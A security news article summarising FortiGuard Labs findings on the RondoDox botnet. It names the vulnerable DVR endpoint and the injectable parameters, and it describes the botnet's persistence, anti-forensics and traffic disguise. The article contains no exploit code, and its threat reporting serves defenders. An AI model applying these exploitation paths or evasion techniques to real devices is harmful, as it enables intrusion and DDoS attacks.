RondoDox: Sophisticated Botnet Exploits TBK DVRs & Four-Faith Routers for DDoS Attacks

FortiGuard Labs has uncovered a stealthy and highly adaptive botnet dubbed RondoDox, which is actively exploiting two critical vulnerabilities—CVE-2024-3721 and CVE-2024-12856. According to Fortinet’s threat intelligence team, RondoDox poses “serious risks to device security and overall network integrity,” as it targets unpatched Linux-based devices with advanced evasion and persistence techniques.

RondoDox has been observed leveraging two distinct vulnerabilities to gain remote command execution capabilities:

• CVE-2024-3721 affects TBK DVR models such as DVR-4104 and DVR-4216. This flaw arises from the improper handling of the /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___ path, allowing attackers to inject OS commands by manipulating the mdb and mdc parameters.
• CVE-2024-12856 targets Four-Faith router models F3x24 and F3x36, where authenticated attackers can abuse the apply.cgi interface to execute arbitrary commands when modifying system time.

Both vulnerabilities are already being weaponized in the wild. FortiGuard notes that “RondoDox incorporates custom libraries and mimics traffic from gaming platforms or VPN servers to evade detection.”

Initially aimed at Linux systems on ARM and MIPS architectures, RondoDox has evolved to target a wide array of Linux platforms including x86-64, Intel 80386, PowerPC, AArch64, and more. The shell script downloader used by the malware checks writable directories for execution permissions and installs the payload while erasing logs and histories to stay hidden.

The malware decodes its configuration using an XOR-based obfuscation algorithm and embeds a shell script to ensure multi-layered persistence. This script modifies system startup files like /etc/rcS, crontab, and even creates symbolic links (e.g., /etc/rc3.d/S99rondo) to maintain control across reboots.

Once embedded, RondoDox scans the system for common forensic tools like wireshark, gdb, tcpdump, and even malware competitors like xmrig or Redtail. If found, these processes are immediately terminated. In a more disruptive move, RondoDox renames key system executables—such as iptables, passwd, shutdown—to randomized strings, crippling system functionality and complicating incident response.

After setup, RondoDox decodes its C2 server address—83[.]150[.]218[.]93—and initiates communication. It can then launch DDoS attacks via HTTP, UDP, and TCP, disguising its traffic as legitimate packets from popular platforms like Minecraft, Discord, Valve, Fortnite, and OpenVPN.

FortiGuard notes: “By impersonating these legitimate services, the malware significantly increases the difficulty for defenders in effectively identifying and blocking its traffic.”

RondoDox is not just another Mirai clone. Its layered persistence, mimicry of legitimate services, and destructive behavior make it a formidable adversary. FortiGuard’s conclusion is clear:

“RondoDox is a sophisticated and emerging malware threat that employs advanced evasion techniques… highlighting the critical need for timely patching of affected systems.”

Related Posts:

• Four-Faith Industrial Routers Under Attack: CVE-2024-12856 Exploited in the Wild
• New Mirai Botnet Variant Targets DVR Systems via CVE-2024-3721
• CVE-2024-9643 & CVE-2024-9644: Authentication Bypass in Four-Faith F3x36 Routers Puts Networks at Risk
• “Gayfemboy” Botnet Leveraging 0-Day Exploit in Four-Faith Industrial Routers
• New Agent Tesla Spyware Variant was spread via Microsoft Word documents